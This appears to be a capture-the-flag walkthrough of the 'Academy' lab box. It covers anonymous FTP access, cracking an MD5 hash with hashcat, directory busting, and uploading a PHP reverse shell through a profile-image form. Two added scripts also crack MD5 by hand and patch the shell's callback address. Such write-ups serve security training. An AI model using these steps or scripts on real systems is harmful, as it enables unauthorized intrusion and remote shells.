Academy001 Walkthrough
Setting up the Box
To begin, we need to set up the box. Obtain the IP address of our Kali (attacking) machine, which we will need later for the reverse shell, using the following command:
ip a
Checking if the Target is Alive
Next, we need to check if our target, the vulnerable Academy box, is alive. Ping it from our Kali machine using the following command:
ping #ip of your vulnerable box
Scanning for Open Ports
We now know that our target machine is alive. We can scan it for open ports with Nmap using the following command:
nmap -A #ip
The -A flag enables Nmap's aggressive scan, which combines OS detection, version detection, default script scanning and traceroute. It gives a much more complete picture of the target than a plain port scan, at the cost of being noisy.
We can see that an FTP service is open on port 21 and an HTTP service is open on port 80.
Accessing the FTP Server
Moreover, Nmap's script output shows that the FTP service allows Anonymous FTP login, which means we can log in to the FTP server without real credentials: the username "anonymous" with an empty password.
To access Anonymous FTP, use the following command:
ftp #ip
For the username, simply enter "anonymous"; for the password, leave it empty and hit enter.
Copying Files from the FTP Server
Now, let's see if we can find anything useful and copy it to our Kali system.
We use the "ls" command to list the files in the directory and copy them to our current directory on Kali with the "get filename" command (note.txt here). Type "bye" (or press Ctrl+C) to leave the FTP session, then confirm the file was copied with "ls" on Kali.
Viewing the Contents of the File
Use “cat” to view the contents of “note.txt”.
From the contents of the file, we discover a username and a password (stored as a hash) for a student account.
Cracking the Hashed Password
Let's try cracking the hashed password. First, we determine the hash type using "hash-identifier". A 32-character hexadecimal digest is most likely MD5; NTLM and MD4 digests have the same length, so the guess is only confirmed once the hash actually cracks.
You may need to extract the "rockyou.txt.gz" password list in the "/usr/share/wordlists/" directory using the command:
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
Now that we know the hash type, we can use "hashcat" with "rockyou.txt" to crack the hash:
hashcat -m 0 -a 0 -O cd73502828457d15655bbd7a63fb0bc8 /usr/share/wordlists/rockyou.txt
Here are the flags used:
hashcat: the command that invokes the hashcat tool.
-m 0: the hash type (mode). 0 is MD5. Hashcat supports hundreds of hash types, and the numeric code selects which one you are cracking.
-a 0: the attack mode. 0 is a straight dictionary attack, which tries every word in the given wordlist (here rockyou.txt) and checks whether its hash matches the target.
-O: enables the optimized kernels, which use faster code paths at the cost of a lower maximum candidate length; that is fine for a wordlist attack.
cd73502828457d15655bbd7a63fb0bc8: the hash to crack. Hashcat tries to find the input that produced this value by hashing each candidate from the wordlist.
/usr/share/wordlists/rockyou.txt: the path to the wordlist used for the dictionary attack. rockyou.txt is a popular choice in password cracking because it is a large collection of real, commonly used passwords.
If you run the command a second time, hashcat reports that the hash is already in its potfile instead of printing the result again; add --show to display the cracked password.
We successfully cracked the password, which is “student”.
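To make the hash-identifier and hashcat steps concrete, here is an added shell example (my own, not part of the original walkthrough and not hashcat's code) that does the same two things by hand: it guesses the hash family from the digest length, as hash-identifier does, and then runs a straight dictionary attack (hashcat's -m 0 -a 0) by hashing every word in a wordlist with md5sum and comparing. The wordlist it reads is a small constructed stand-in for rockyou.txt; the target hash is the one from note.txt. It strips Windows line endings and still processes a final line that has no newline, two things that silently break naive loops over real wordlists.

```shell
#!/bin/sh
# Added example: a manual MD5 dictionary attack, i.e. what "hashcat -m 0 -a 0" does.

# Guess the hash family from the digest length (what hash-identifier does first).
# A 32-hex-char digest is usually MD5, but NTLM and MD4 are the same length,
# so the guess must be confirmed by actually cracking it.
guess_hash_type() {
    case "$1" in
        *[!0-9a-fA-F]*) echo "not-hex"; return 1 ;;
    esac
    case "${#1}" in
        32) echo "md5 (or ntlm/md4)" ;;
        40) echo "sha1" ;;
        64) echo "sha256" ;;
        *)  echo "unknown"; return 1 ;;
    esac
}

# Hex MD5 of the string in $1. printf '%s' is used instead of echo so no
# trailing newline is hashed (echo would change the digest). Falls back to
# BSD/macOS "md5 -q" when md5sum is absent.
md5_hex() {
    if command -v md5sum >/dev/null 2>&1; then
        printf '%s' "$1" | md5sum | cut -d' ' -f1
    else
        printf '%s' "$1" | md5 -q
    fi
}

# Straight dictionary attack: $1 = target hash, $2 = wordlist path.
# Prints the matching word and returns 0, or returns 1 when the list is exhausted.
crack_md5() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    cr=$(printf '\r')
    # "|| [ -n "$word" ]" also processes a last line with no trailing newline.
    while IFS= read -r word || [ -n "$word" ]; do
        word=${word%"$cr"}          # tolerate CRLF wordlists
        if [ "$(md5_hex "$word")" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$2"
    return 1
}

# Constructed stand-in for rockyou.txt: a few common passwords, one with CRLF,
# and no newline after the last one.
make_sample_wordlist() {
    f=$(mktemp)
    printf '123456\npassword\r\nqwerty\nstudent\nletmein' > "$f"
    printf '%s\n' "$f"
}

# The hash found in note.txt on the Academy box.
NOTE_HASH=cd73502828457d15655bbd7a63fb0bc8

wl=$(make_sample_wordlist)
echo "type:    $(guess_hash_type "$NOTE_HASH")"
echo "cracked: $(crack_md5 "$NOTE_HASH" "$wl")"
rm -f "$wl"
```

Against the real rockyou.txt this loop is thousands of times slower than hashcat, since it forks md5sum for every candidate; the point is only to show what the -m and -a flags select, and why a wordlist's line endings matter.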
Finding the Website Directory
Now we need to find the part of the website where these login details can be used, using the directory-busting technique with the "gobuster" tool:
gobuster dir -u 192.168.100.234:80 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
gobuster: the name of the tool you are running. Gobuster is a popular directory and file brute-forcing tool used in web application security testing and penetration testing.
dir: the mode Gobuster should operate in; "dir" means directory brute-forcing.
-u 192.168.100.234:80: the target URL to scan, i.e. the web server at 192.168.100.234 on port 80 (HTTP).
-w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt: the wordlist whose entries Gobuster appends to the URL, requesting each one to check which paths exist on the target web server.
We have found the “academy” and “phpmyadmin” directories on the given URL. Let’s visit the “academy” directory and see if we can use the cracked credentials on the site.
To visit, simply type "http://192.168.100.234:80/academy" in your browser.
Logging in to the Website
Let’s use the username (from the note.txt) and cracked password on the site.
Voila! We have successfully logged in.
Exploring the Site
Let's visit the other pages available to us. On the My Profile page we can see that we are able to upload a profile image to the portal. This is useful: if the upload is not restricted to genuine image files, we can upload a script instead and use it to get a reverse shell.
Preparing the Reverse Shell
If you recall, during directory busting we found a "phpmyadmin" directory, so we can assume the website is running on a PHP server. We therefore need a reverse shell written in PHP. You can download one from the following link:
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
After downloading, two things have to be changed for it to work: the IP address the script will connect back to and the port. Open the script in your favourite editor and change the two lines marked "CHANGE THIS": set $ip to the IP address of your Kali machine (the one from "ip a" at the start) and $port to the port your listener will use, 443 in the next step.
Starting the Listener
After making the changes, start the listener on your Kali machine:
nc -lvnp 443
nc: the command itself, short for "netcat", a versatile networking utility used for creating network connections, transferring data and port scanning.
-l: tells nc to listen for incoming connections; nc acts as a server, waiting for a connection instead of making one.
-v: verbose mode; nc prints details about the connection and any errors that occur.
-n: do not perform DNS resolution; use numeric addresses only, which avoids delays from DNS lookups.
-p 443: the port number to listen on. Port 443 is normally used for HTTPS, and that is exactly why it is a good choice here: outbound connections to 443 are rarely blocked by egress filtering, so the victim is likely to be able to reach us. Ports below 1024 require root to bind, so run the listener with sudo if it fails with a permission error.
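The two edits to the reverse shell are easy to get wrong, and if either one is missed the listener simply never receives a connection, with no error on either side. This added shell example (my own, not part of the walkthrough and not pentestmonkey's code) patches the $ip and $port lines of php-reverse-shell.php with sed, matching the two "CHANGE THIS" lines the real file has, then verifies that both new values landed and that the defaults are gone before you upload it. It runs on a constructed three-line stub standing in for the downloaded script; KALI_IP is an assumed attacker address, and the port 443 matches the listener above.

```shell
#!/bin/sh
# Added example: patch and verify the call-back address in php-reverse-shell.php.

# Rewrite the two "CHANGE THIS" lines. $1 = script path, $2 = our IP, $3 = our port.
# The patched script goes to stdout so the downloaded original is left untouched.
# "[$]" is a literal dollar sign in the sed pattern; "$" is not special in the
# replacement, so "\$ip" just produces "$ip".
configure_revshell() {
    sed -e "s/^[$]ip = '[^']*';/\$ip = '$2';/" \
        -e "s/^[$]port = [0-9]*;/\$port = $3;/" "$1"
}

# Return 0 only if the patched script ($1) calls back to $2:$3 and the
# pentestmonkey defaults (127.0.0.1 / 1234) are gone. A shell that still
# points at 127.0.0.1 connects to the victim itself and we never see it.
verify_revshell() {
    grep -qF "\$ip = '$2';" "$1" || { echo "ip not set" >&2; return 1; }
    grep -qF "\$port = $3;" "$1" || { echo "port not set" >&2; return 1; }
    if grep -qF "127.0.0.1" "$1" || grep -qF "\$port = 1234;" "$1"; then
        echo "default values still present" >&2
        return 1
    fi
    return 0
}

# Constructed stand-in for the downloaded script: only the two lines that matter,
# written exactly as they appear in pentestmonkey's php-reverse-shell.php.
make_stub() {
    f=$(mktemp)
    printf "<?php\n\$ip = '127.0.0.1';  // CHANGE THIS\n\$port = 1234;       // CHANGE THIS\n" > "$f"
    printf '%s\n' "$f"
}

KALI_IP=192.168.100.10   # assumed attacker address; use the one from "ip a"
LPORT=443                # must match the listener: nc -lvnp 443

stub=$(make_stub)
patched=$(mktemp)
configure_revshell "$stub" "$KALI_IP" "$LPORT" > "$patched"
if verify_revshell "$patched" "$KALI_IP" "$LPORT"; then
    echo "ready to upload: $patched"
fi
rm -f "$stub" "$patched"
```

Run configure_revshell on the real downloaded file, redirect the output to the file you will upload, and run verify_revshell on that before starting the listener; the listener port you pass to both functions should be the same variable so the two cannot drift apart.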
Uploading and Triggering the Shell
Let's upload our script in place of the profile image. Then open the uploaded "image" in a new tab to execute it, making sure first that the listener is still running. Because the server treats the uploaded file as PHP rather than as an image, clicking "Open image in new tab" executes the reverse shell script, and we get a shell on the victim in our Kali terminal.
Congratulations, our walkthrough finishes here!